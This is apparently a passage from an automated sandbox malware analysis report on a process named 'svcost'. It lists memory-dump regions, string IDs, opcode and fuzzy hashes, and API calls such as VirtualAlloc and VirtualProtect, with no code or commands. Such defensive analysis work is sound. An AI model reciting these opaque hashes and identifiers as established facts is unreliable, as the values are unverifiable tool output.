                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$d
                                                                                                • API String ID: 0-1322973597

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$`Xh
                                                                                                • API String ID: 0-3361563179
                                                                                                • Opcode ID: 9926f7289be940f67ed34cf1480ea036fff07e69cece20006fe3da5b92eb8c9c
                                                                                                • Instruction ID: 5d9b40c8b19271f4f5114f2a260cbd5ff9d5b34edfd585baec4b5b3d7b6321af
                                                                                                • Opcode Fuzzy Hash: 9926f7289be940f67ed34cf1480ea036fff07e69cece20006fe3da5b92eb8c9c
                                                                                                • Instruction Fuzzy Hash: D6C13874E09268DFCB11DFA9D884B9DBBB5FB49310F1080AAE409AB755DB349E85CF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh$|*6
                                                                                                • API String ID: 0-3930423001
                                                                                                • Opcode ID: cc97ef1af5fdf070fdc7d6b8fc742486afa7744366046af5d15f1b7324b8180c
                                                                                                • Instruction ID: 3c9dc0467255a64ed9ddbaa5cb64cafceffaaf5567767fa1c2a77a8191830cf2
                                                                                                • Opcode Fuzzy Hash: cc97ef1af5fdf070fdc7d6b8fc742486afa7744366046af5d15f1b7324b8180c
                                                                                                • Instruction Fuzzy Hash: D7B11374E04218CFDB54DFA5D994BADBBF2FB49314F1080ADE419AB295CB306A86CF01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$H!p
                                                                                                • API String ID: 0-1960402415
                                                                                                • Opcode ID: 6849b5f58ab4922b180ac5535dffb03299333f3bb9f7dbee96b7a40c4ca20530
                                                                                                • Instruction ID: 9f7a6d50fcc39d4eae59efa899eaa4169c88fe755a672ca219b9d0acafb7b5ad
                                                                                                • Opcode Fuzzy Hash: 6849b5f58ab4922b180ac5535dffb03299333f3bb9f7dbee96b7a40c4ca20530
                                                                                                • Instruction Fuzzy Hash: 655199313183109FD729AF34D865A2E7BB2EFC5314B25456EE506CB3A5CE31AC06CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$`Xh
                                                                                                • API String ID: 0-2970583535
                                                                                                • Opcode ID: 6997ec0a49af52924a4b09f31e4c717521c5080ed522df0c05c5a83593a01026
                                                                                                • Instruction ID: ae51cd2a58d336b628de2054f468e397c7f4754657db3d244d88b9d2e309b096
                                                                                                • Opcode Fuzzy Hash: 6997ec0a49af52924a4b09f31e4c717521c5080ed522df0c05c5a83593a01026
                                                                                                • Instruction Fuzzy Hash: 11711874E142089FDB05DFA9D885A9EBBB6FF89310F208029E405A73A8DB745E46CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$`Xh
                                                                                                • API String ID: 0-2970583535
                                                                                                • Opcode ID: b1fe4e5ac5e9f43155409aa1ee8655958eb2fbc21c4b5dd5d18fb53af6fda9fa
                                                                                                • Instruction ID: 5dc253629f4390f4dce81225112f5a54d8821174a217596ce61c97d36a496854
                                                                                                • Opcode Fuzzy Hash: b1fe4e5ac5e9f43155409aa1ee8655958eb2fbc21c4b5dd5d18fb53af6fda9fa
                                                                                                • Instruction Fuzzy Hash: BB711A74E14208DFDB05DFA9D485A9EBBF6FF89310F208029E405A7368DB745A46CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: hB+$Q,
                                                                                                • API String ID: 0-2296822707
                                                                                                • Opcode ID: 11259801ede67b9c58c8fd5409b1d82e808fe1c3070b83209c549e829ce2625b
                                                                                                • Instruction ID: fb1932b11a8ab08f0ecbb85c7fce2805cfcc6981943a76350ec31e19d844c2af
                                                                                                • Opcode Fuzzy Hash: 11259801ede67b9c58c8fd5409b1d82e808fe1c3070b83209c549e829ce2625b
                                                                                                • Instruction Fuzzy Hash: 1031E670E043498FCB08DFB8C854AEEBFB1EF89300F1586A9D505EB291D770A985CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5$`Xh
                                                                                                • API String ID: 0-4184804756
                                                                                                • Opcode ID: 5311805a5e82f59b3480cab08b2c59c6f1b4f4511434c6967076ec8f403613cc
                                                                                                • Instruction ID: 91c77f465b73f6352177eb33a1fc14b9a829c17e85ca042055eb982f78bd9145
                                                                                                • Opcode Fuzzy Hash: 5311805a5e82f59b3480cab08b2c59c6f1b4f4511434c6967076ec8f403613cc
                                                                                                • Instruction Fuzzy Hash: 50110578A152288FCB25DF19D884ACAB7F5FB89300F1481EAE84DA3758CA345F81CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$>
                                                                                                • API String ID: 0-3778932101
                                                                                                • Opcode ID: caad2fc53d7a1848dbb96a337bc6f702aff32cdab91896f675b726832fa6d80b
                                                                                                • Instruction ID: f47d740a583755fb54156a15ddc30530931c427e562913953151f30b5947e7f5
                                                                                                • Opcode Fuzzy Hash: caad2fc53d7a1848dbb96a337bc6f702aff32cdab91896f675b726832fa6d80b
                                                                                                • Instruction Fuzzy Hash: 50F01C34D05248EFCB51DFA8D5556ADBBB4EB89300F10C1EA9C5893391E6359E46CF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$`Xh
                                                                                                • API String ID: 0-3201267524
                                                                                                • Opcode ID: 87f90b4ef67aef51743c5ee9b2281aabf0768a5b50cfab4aea7d736fa9b8d7a9
                                                                                                • Instruction ID: 9f1b6bad9e218dbfc82ed29a1796facf0692dae348e92732eda6d9226d64e03b
                                                                                                • Opcode Fuzzy Hash: 87f90b4ef67aef51743c5ee9b2281aabf0768a5b50cfab4aea7d736fa9b8d7a9
                                                                                                • Instruction Fuzzy Hash: BAF030746591188FD756DF68C898B8AB7F6EB89304F1041EAA50DA7354CB349F92CF10
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04B7DDE4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477347233.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4b70000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 7e8bc774d9d6027879b688037179103cbd2a937fd6449e669b8f2253dd60f2c1
                                                                                                • Instruction ID: 3ae199b3ec5e00e17a6216e8ae85f5cb7edaf727efb93d36ec153fdfb6457e14
                                                                                                • Opcode Fuzzy Hash: 7e8bc774d9d6027879b688037179103cbd2a937fd6449e669b8f2253dd60f2c1
                                                                                                • Instruction Fuzzy Hash: D73185B4D012489FDF14CFA9D984AEEFBB5EF49310F24942AE824BB210D735A945CF64
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474344220.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c50000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 062089b4f7bf1a2c8a1ac77717945cc56e616d57ba693489465853df6ae3ad54
                                                                                                • Instruction ID: cc050a67127621ef18974036ff1e5c36f742da11480525e7acd40e92ffde8bb4
                                                                                                • Opcode Fuzzy Hash: 062089b4f7bf1a2c8a1ac77717945cc56e616d57ba693489465853df6ae3ad54
                                                                                                • Instruction Fuzzy Hash: D831DBB8D012189FDF10CFA9D984AEEFBF1AF49350F24842AE814B7210C735A945CF64
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474344220.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c50000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 0343bcfb78f2e6a92abd9692858c1d07de751e6cd545a535d159ccc8221f89f5
                                                                                                • Instruction ID: 1e5bf459ef068a17b67e78c29a85ef1410e4e935498df46cafa8e827eb7a96d1
                                                                                                • Opcode Fuzzy Hash: 0343bcfb78f2e6a92abd9692858c1d07de751e6cd545a535d159ccc8221f89f5
                                                                                                • Instruction Fuzzy Hash: F931DBB8D012189FCB00CFA9D884AEEFBF4AB49310F24842AE814B7200C734A945CF64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 0fd2e05279ab83c2db55dd0faaceefef39c333ff6e573ebb318e980b3f8b663f
                                                                                                • Instruction ID: e518b485531a9e941c0aaa112ec59fba7d9e8a78883430a4e275a3071f658e63
                                                                                                • Opcode Fuzzy Hash: 0fd2e05279ab83c2db55dd0faaceefef39c333ff6e573ebb318e980b3f8b663f
                                                                                                • Instruction Fuzzy Hash: D8C13570B006248FDB04DF69C994AAEBBF6EF89710F1180A9E505DB3A5DB70ED41CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1c4858d8549cc1425ddf7bb464190d850ad265bfe69ba456254aaedc3d4ce149
                                                                                                • Instruction ID: 8a9f3021a2f1a52cbd914180a972cdc33e966f4bec5d2769103bfdbfa9238156
                                                                                                • Opcode Fuzzy Hash: 1c4858d8549cc1425ddf7bb464190d850ad265bfe69ba456254aaedc3d4ce149
                                                                                                • Instruction Fuzzy Hash: B4E11474A15218CFDB14DF69E884BADBBB6FF89310F1081A9E409A7764DB305E85CF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 6bf3bba432cdb7bd907df701b076dd1e985ceb621bd765c5d46227aa801968c7
                                                                                                • Instruction ID: a577e385643ce8ac7f53fb25491806a1cc86e96432f6b0effd08f9feff3f8bd9
                                                                                                • Opcode Fuzzy Hash: 6bf3bba432cdb7bd907df701b076dd1e985ceb621bd765c5d46227aa801968c7
                                                                                                • Instruction Fuzzy Hash: F3E15778A15218CFDB11DF69E890BADBBB1FF89310F1081A9D409A7765DB305E89CF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: ff98b57c908553783e3a557e593dbba39718d05ad3ced125e5b7d5fc918984b9
                                                                                                • Instruction ID: 119a447fa7ce4a869bbb2248ebbab4cd405061dbbe9a52eff33f3f94596b0b49
                                                                                                • Opcode Fuzzy Hash: ff98b57c908553783e3a557e593dbba39718d05ad3ced125e5b7d5fc918984b9
                                                                                                • Instruction Fuzzy Hash: F2E13674A15218CFDB15EF69E884BADBBB2FF89310F1081A9E409A7764DB305E85CF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 008E42BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474144763.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_8e0000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 008E42BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474144763.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_8e0000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p
                                                                                                • API String ID: 0-2763268518
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p
                                                                                                • API String ID: 0-1059414960
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p!p
                                                                                                • API String ID: 0-1147775804
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oOI
                                                                                                • API String ID: 0-15478488
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oOI
                                                                                                • API String ID: 0-15478488
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04B7EFA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477347233.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4b70000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 10a6c44423c336bdbeb931a3b2e4454df0808b40abadebbb4c12dbae98cb7110
                                                                                                • Instruction ID: a29185c63ccc08d767313e4ad28c76c031521165cb30ddc236a0353e63fc0095
                                                                                                • Opcode Fuzzy Hash: 10a6c44423c336bdbeb931a3b2e4454df0808b40abadebbb4c12dbae98cb7110
                                                                                                • Instruction Fuzzy Hash: 16313E70A09228CFEB20DF69DA857ADBBF5FF4D314F20A1A9D409A3655D7746980CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: acf6324b1e115e1adffe350c0476132500a16f4e3cf8124249e3c1d2602fdbaf
                                                                                                • Instruction ID: ef0165cd3c4dc56a120a51565934f40fafbb47ce25629a30da6432dddca92168
                                                                                                • Opcode Fuzzy Hash: acf6324b1e115e1adffe350c0476132500a16f4e3cf8124249e3c1d2602fdbaf
                                                                                                • Instruction Fuzzy Hash: AE313874D05228CFDB28DF26D854BADBBBAFB89300F1081EAE449A3655DB704A85DF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 6a225fb47ee71b0da85b935ba0406baacf4de5e9c5674bf42ba13c051c02c7a5
                                                                                                • Instruction ID: f3336dab50ab092af7fa549de262b586fb7a94b00ab3672a359e94cf718b0b4b
                                                                                                • Opcode Fuzzy Hash: 6a225fb47ee71b0da85b935ba0406baacf4de5e9c5674bf42ba13c051c02c7a5
                                                                                                • Instruction Fuzzy Hash: 5D41F174D05268CFDB20CF69D984BDEBBF1AF49310F2081AAD409AB661D7B45A85DF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 41e516ed150c5f712d9879366ca3eef106e72f50764be96bc6fb2c6cc22c08d4
                                                                                                • Instruction ID: a1203c744f8c4a59ddf09e7b32359b49dadd6f37aa1ea0c2b8e46b27835deb5c
                                                                                                • Opcode Fuzzy Hash: 41e516ed150c5f712d9879366ca3eef106e72f50764be96bc6fb2c6cc22c08d4
                                                                                                • Instruction Fuzzy Hash: 13214675E552098BDB09DFAAC8447EEBBFAEB8E300F10942AD415B3390DB744981CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ILuV
                                                                                                • API String ID: 0-1855505789
                                                                                                • Opcode ID: eb053716dbecb7584cde8810a664bdd26a19d4fbad3588fd4ca78d7d460d5545
                                                                                                • Instruction ID: 8683422bc852c794369ba090143d74d5ee2d4b2f385965ab16c06265990c42f8
                                                                                                • Opcode Fuzzy Hash: eb053716dbecb7584cde8810a664bdd26a19d4fbad3588fd4ca78d7d460d5545
                                                                                                • Instruction Fuzzy Hash: 54219C74E04249CFDB04EF6AE884AAEBBF1FF99300F208465D406A7355D730AA42CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 623093819f0da2c6560fb3e37163dc38f7353f16eb78c4516092ed260a55c339
                                                                                                • Instruction ID: a7a779c49a3ea4dd99d6016c5aae82115622f6fb3495ea65cfb2755bcade6f05
                                                                                                • Opcode Fuzzy Hash: 623093819f0da2c6560fb3e37163dc38f7353f16eb78c4516092ed260a55c339
                                                                                                • Instruction Fuzzy Hash: E4314D70D09208DFD705DFA8D488BEEBBF9EB4D300F1180AAE005A7650DB744A85CF16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 7e1956ce88091fd0e5e365e577b36b131097f6e51616b0e7153ce4773bb0d7fd
                                                                                                • Instruction ID: 9dec9b606ccc76a3bf5ef7cbb7b067fff8922409487e94b0b7872744c83164b2
                                                                                                • Opcode Fuzzy Hash: 7e1956ce88091fd0e5e365e577b36b131097f6e51616b0e7153ce4773bb0d7fd
                                                                                                • Instruction Fuzzy Hash: ED411878A112288FCB64EF24D881B9EB7B6FB89310F1081E9D44DA7759CB305E91CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ILuV
                                                                                                • API String ID: 0-1855505789
                                                                                                • Opcode ID: bc1362e19622089072b865130cff67ceabee6b03c1f0746cfe462af8ab7f320d
                                                                                                • Instruction ID: 4e80bece6245aca3c55ff0b71a71b200e27f0dca8d1de00ec792d3635dae59b0
                                                                                                • Opcode Fuzzy Hash: bc1362e19622089072b865130cff67ceabee6b03c1f0746cfe462af8ab7f320d
                                                                                                • Instruction Fuzzy Hash: 9D218E74E04219CFDB04EF6AE880AAEB7F5FB88310F20C465D41AA7354D730AA41CF51
                                                                                                Strings
                                                                                                Memory Dump Source
